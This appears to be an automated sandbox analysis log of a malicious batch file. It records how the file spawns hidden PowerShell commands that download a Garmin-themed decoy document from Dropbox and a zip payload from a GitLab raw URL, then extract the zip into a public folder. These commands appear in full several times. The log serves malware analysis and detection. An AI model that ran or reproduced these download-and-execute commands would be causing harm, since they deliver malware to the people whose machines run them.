                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6544:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wwrqufmw.bxt.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngarm13de02.bat" "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\hngarm13de02.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hngarm13de02.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hngarm13de02.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hngarm13de02.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hngarm13de02.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fInd
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\hngarm13de02.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\hngarm13de02.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\hngarm13de02.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\hngarm13de02.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe fIndJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: C:\Users\Vinay\Projects\simple_launcher\dist\t64.pdb source: pip.exe.18.dr
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb*Gs source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: n.pdb source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76C7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: *.pdb source: powershell.exe, 0000000B.00000002.1744952074.0000022CB74E2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76C7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 0000000B.00000002.1745870772.0000022CB76C7000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: hngarm13de02.bat, type: SAMPLE
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: pip3.exe.18.drStatic PE information: real checksum: 0x2a492 should be: 0x1dca3
                Source: wsdump.exe.18.drStatic PE information: real checksum: 0x2a492 should be: 0x1c91b
                Source: normalizer.exe.18.drStatic PE information: real checksum: 0x2a492 should be: 0x1ebd5
                Source: pip3.12.exe.18.drStatic PE information: real checksum: 0x2a492 should be: 0x1dca3
                Source: pip.exe.18.drStatic PE information: real checksum: 0x2a492 should be: 0x1dca3
                Source: x86_64-w64-mingw32-nmakehlp.exe.18.drStatic PE information: section name: .xdata
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B897047 push esp; retf 11_2_00007FFD9B897048
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFD9BAB476C push eax; iretd 13_2_00007FFD9BAB477A

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\reg1.3\tclreg13.dllJump to dropped file
